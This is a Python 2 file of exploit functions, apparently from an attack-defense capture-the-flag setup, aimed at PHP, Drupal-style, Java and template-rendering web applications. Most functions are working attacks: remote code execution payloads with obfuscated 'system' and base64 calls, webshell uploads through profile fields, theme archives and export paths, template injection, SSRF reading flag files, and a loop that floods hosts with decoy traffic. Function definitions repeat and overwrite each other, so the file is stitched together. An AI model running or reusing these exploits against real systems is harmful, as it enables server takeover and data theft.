def vulnerable_attack(target, target_port, cmd):
'''
this is the payload script for vuln:
eval($_POST[333]);
assert($_POST[333]);
'''
try:
#cmd = base64.b64encode(cmd)
# This payload may not work under some php versions
#payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd
#print payload
#payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd
payload = cmd
data = 'form_id=user_register_form&mail[0][#lazy_builder][0]=system&mail[#type]=markup&mail[0][#lazy_builder][1][0]=%s' % quote(
payload)
res = http(
"post", target, target_port,
"/user/register?element_parents=account/mail/%23value&ajax_form=1",
data, headers)
except Exception, e:
debug_print(traceback.format_exc())
dump_error("attack failed", target, "vulnerable attack")
res = "error"
def shit(target, target_port, cmd):
s = requests.Session()
ip = target
shellhash = hashlib.md5(str(time.time())).hexdigest()
url = 'http://%s:%s/web/login' % (ip, str(target_port))
url_2 = 'http://%s:%s/web/login_check' % (ip, str(target_port))
url_3 = 'http://%s:%s/web/' % (ip, str(target_port))
url_4 = 'http://%s:%s/web/settings/' % (ip, str(target_port))
url_5 = 'http://%s:%s/web/logout' % (ip, str(target_port))
url_6 = 'http://%s:%s/web/admin/order/manage/export/course?loop=s&start=0&fileName=/var/www/html/web/files/%s.php' % (
ip, str(target_port), shellhash)
url_7 = 'http://%s:%s/web/register/submited/1/ae797a91d0493acb27050b05c884a4ae' % (
ip, str(target_port))
'''
url = 'http://%s:%s/login' % (ip,str(target_port))
url_2 = 'http://%s:%s/login_check' %(ip,str(target_port))
url_3 = 'http://%s:%s/' %(ip,str(target_port))
url_4 = 'http://%s:%s/settings/' % (ip,str(target_port))
url_5 = 'http://%s:%s/logout' % (ip,str(target_port))
url_6 = 'http://%s:%s/admin/order/manage/export/course?loop=s&start=0&fileName=/var/www/html/web/files/%s.php' % (ip,str(target_port),shellhash)
url_7 = 'http://%s:%s/register/submited/1/ae797a91d0493acb27050b05c884a4ae' % (ip,str(target_port))
'''
# user login
content = s.get(url).content
index_1 = content.find('<meta name="description"')
index_2 = content.find('name="csrf-token"/>')
token = content[index_1 + 35 + len('<meta name="description"'):index_2 - 2]
debug_print(token)
s.post(url_2,
data={
'_username': '******',
'_password': '******',
'_csrf_token': '%s' % token
})
s.get(url_3)
# user shell
shell = '<?php eval($_POST[2222]);?>'
s.post(url_4,
data={
'profile[truename]': '%s' % shell,
'_csrf_token': '%s' % token
})
s.get(url_5)
# admin login
s.get(url_7)
s.get(url_6, allow_redirects=False)
payload = "system('%s');" % cmd
data = '2222=%s' % quote(payload)
res = http("post", target, target_port, "/web/files/%s.php" % shellhash,
data, headers)
print res
return res
def send(hosts, msgs):
#here are your targets
#for i in xrange(0,5):
while True:
tmp_file = open("./data/ua.data", "rb")
rd = tmp_file.readlines()
headers['User-Agent'] = rd[random.randint(0, len(rd) - 1)].strip()
tmp_file.close()
rnds = random.randint(0, 6)
if headers.has_key('Hacked by'):
headers.pop('Hacked by')
if rnds == 0:
headers['Hacked by'] = "Redbud"
headers['Accept-Language'] = ac_lang[random.randint(
0,
len(ac_lang) - 1)]
#print headers#['User-Agent']
contents = msgs[random.randint(0, len(msgs) - 1)].strip()
if not contents:
continue
contents = contents.split("*---craso---*")
if len(contents) < 2:
continue
for host in hosts:
ip, port = host[:-1].split(":")
try:
print contents[0] + " " + ip + ":" + port + contents[
1] + "?" + contents[2].format(crasolee_para=quote(trash()),
crasolee_para0=para_key())
if contents[0] == 'get' or contents[0] == 'GET':
tmp = http(
contents[0], ip, int(port), contents[1] + "?" +
contents[2].format(crasolee_para=quote(trash()),
crasolee_para0=para_key()), '',
headers)
else:
tmp = http(
contents[0], ip, int(port), contents[1],
contents[2].format(crasolee_para=quote(trash()),
crasolee_para0=para_key()), headers)
except Exception, e:
print e
time.sleep(1)
def shit(target, target_port, cmd):
s = requests.Session()
ip = target
shellhash = hashlib.md5(str(time.time())).hexdigest()
url = 'http://%s:%s/app.php/login' % (ip, str(target_port))
url_2 = 'http://%s:%s/app.php/login_check' % (ip, str(target_port))
url_3 = 'http://%s:%s/app.php/' % (ip, str(target_port))
url_4 = 'http://%s:%s/app.php/settings/' % (ip, str(target_port))
url_5 = 'http://%s:%s/app.php/logout' % (ip, str(target_port))
url_6 = 'http://%s:%s/app.php/course_set/1/manage/course/1/manage/student/export/datas?fileName=/var/www/html/web/files/tmp/%s.php' % (
ip, str(target_port), shellhash)
content = s.get(url).content
index_1 = content.find('<meta name="description"')
index_2 = content.find('name="csrf-token"/>')
token = content[index_1 + 35 + len('<meta name="description"'):index_2 - 2]
debug_print(token)
s.post(url_2,
data={
'_username': '******',
'_password': '******',
'_csrf_token': '%s' % token
})
s.get(url_3)
shell = '<?php eval($_POST[2222]);?>'
s.post(url_4,
data={
'profile[job]': '%s' % shell,
'_csrf_token': '%s' % token
})
s.get(url_5)
content = s.get(url).content
index_1 = content.find('<meta name="description"')
index_2 = content.find('name="csrf-token"/>')
token = content[index_1 + 35 + len('<meta name="description"'):index_2 - 2]
debug_print(token)
s.post(url_2,
data={
'_username': '******',
'_password': '******',
'_csrf_token': '%s' % token
})
s.get(url_6)
payload = "system('%s');" % cmd
data = '2222=%s' % quote(payload)
res = http("post", target, target_port, "/files/tmp/%s.php" % shellhash,
data, headers)
print res
return res
def waf_check(target, target_port):
url = 'http://%s:%d%s' % (target, int(target_port), url_label)
r = requests.post(url,
timeout=timeout,
headers={"Accept-Encoding": "aasas"})
res1 = r.text
res2 = http('post', target, int(target_port),
url_label + '?' + get_payload, post_payload, {})
res2 = res2.decode('utf-8')
if res1 == res2:
print '|url__ok_|',
return True
print '|url_fail|',
return False
def vulnerable_attack(target, target_port, cmd):
'''
this is the payload script for vuln:
/admin.php?action=themeinstall
'''
try:
# This payload may not work under some php versions
#payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd
#print payload
s = requests.session()
url_1 = "http://%s:%d/login.php" % (target, int(target_port))
url_2 = "http://%s:%d/admin.php?action=themeinstall" % (
target, int(target_port))
my_hash = random_string()
s.post(url_1,
data="cont1=123456789&bogus=&submit=Log+in",
headers={
"Accept-Encoding": "identity",
"Content-Type": "application/x-www-form-urlencoded"
})
shell_content = "<?php system($_REQUEST['%s']);?>" % my_hash
file_name = my_hash + ".php"
tar_name = my_hash + ".tar.gz"
open('/tmp/%s' % file_name, 'w').write(shell_content)
res = os.popen('cd /tmp;tar cvfz %s %s' % (tar_name, file_name)).read()
debug_print(res)
data = {"submit": "Upload"}
files = {"sendfile": open("/tmp/" + tar_name, 'rb')}
s.post(url_2,
data=data,
files=files,
headers={"Accept-Encoding": "identity"})
res = os.popen('rm /tmp/%s /tmp/%s' % (file_name, tar_name)).read()
debug_print(res)
data = '%s=%s' % (my_hash, quote(cmd))
res = http("post",
target,
target_port,
"/data/themes/%s" % (file_name),
data,
headers=headers)
except Exception, e:
debug_print(traceback.format_exc())
dump_error("attack failed", target, "vulnerable attack")
res = "error"
def vulnerable_attack(target, target_port, cmd):
'''
this is the payload script for vuln:
eval($_POST[333]);
assert($_POST[333]);
'''
try:
payload = "/link?url=file:///flag"
res = http("get", target, target_port, payload, "", headers)
res = cmd_prefix + str(res) + cmd_postfix
except Exception, e:
debug_print(traceback.format_exc())
dump_error("attack failed", target, "vulnerable attack")
res = "error"
def vulnerable_attack(target, target_port, cmd):
'''
this is the payload script for vuln:
eval($_POST[222]);
'''
try:
cmd = base64.b64encode(cmd)
payload = "$a='sy'.'stem';$b = '%s';$a(base64_decode($b));" % cmd
data = '222=%s' % quote(payload)
res = http("post", target, target_port, "/index.php", data, headers)
except Exception, e:
debug_print(traceback.format_exc())
dump_error("attack failed", target, "vulnerable attack")
res = "error"
def vulnerable_attack(target, target_port, cmd):
'''
this is the payload script for vuln:
include "php://input";
'''
try:
cmd = urllib.unquote(cmd)
cmd = base64.b64encode(cmd)
data = "<?php $a='sy'.'stem';$b = '%s';$a(base64_decode($b));?>" % cmd
res = http("post", target, target_port, "/index.php?f=a", data,
headers)
except Exception, e:
debug_print(traceback.format_exc())
dump_error("attack failed", target, "vulnerable attack")
res = "error"
def vulnerable_attack(target, target_port, cmd):
'''
this is the payload script for vuln:
eval($_POST[333]);
assert($_POST[333]);
'''
try:
payload = "/{{().__class__.__bases__.0.__subclasses__().59.__init__.__globals__.linecache.os.popen(\"" + cmd + "\").read()}}"
res = http("get", target, target_port, payload, "", headers)
before = "<h1>URL "
after = " not found</h1><br/>"
s = res[res.find(before) + len(before):res.find(after)]
res = s
except Exception, e:
debug_print(traceback.format_exc())
dump_error("attack failed", target, "vulnerable attack")
res = "error"
def vulnerable_attack(target, target_port, cmd):
'''
this is the payload script for vuln:
eval($_POST[333]);
assert($_POST[333]);
'''
try:
#cmd = base64.b64encode(cmd)
# This payload may not work under some php versions
#payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd
#print payload
data = 'haozigege=%s' % quote(cmd)
res = http("post", target, target_port,
"/charpter2-1.0-SNAPSHOT/1.jsp", data, headers)
except Exception, e:
debug_print(traceback.format_exc())
dump_error("attack failed", target, "vulnerable attack")
res = "error"
def vulnerable_attack(target, target_port, cmd):
'''
this is the payload script for vuln:
eval($_POST[333]);
assert($_POST[333]);
'''
try:
cmd = base64.b64encode(cmd)
# This payload may not work under some php versions
#payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd
#print payload
payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));" % cmd
data = '222=%s' % quote(payload)
res = http("post", target, target_port, "/1.php", data, headers)
except Exception, e:
debug_print(traceback.format_exc())
dump_error("attack failed", target, "vulnerable attack")
res = "error"
def vulnerable_attack(target, target_port, cmd):
'''
this is the payload script for vuln:
eval($_POST[333]);
assert($_POST[333]);
'''
try:
#cmd = base64.b64encode(cmd)
# This payload may not work under some php versions
#payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd
#print payload
res = http(
"get", target, target_port,
"/index.php/index/index/?back1=system&back2=%s" % quote(cmd), "",
headers)
except Exception, e:
debug_print(traceback.format_exc())
dump_error("attack failed", target, "vulnerable attack")
res = "error"
def vulnerable_attack(target,target_port,cmd):
'''
this is the payload script for vuln:
eval($_POST[333]);
assert($_POST[333]);
'''
try:
cmd = base64.b64encode(cmd)
# This payload may not work under some php versions
#payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd
#print payload
data = 'cmd=%s'% (flag_path)
headers['Cookie'] = data
headers['X-Forwarded-For'] = '8.8.8.8'
res = http("post",target,target_port,"/index.php/admin/login/backdoor?hongkexueyuan=highlight_file",data,headers)
except Exception,e:
debug_print(traceback.format_exc())
dump_error("attack failed",target,"vulnerable attack")
res = "error"
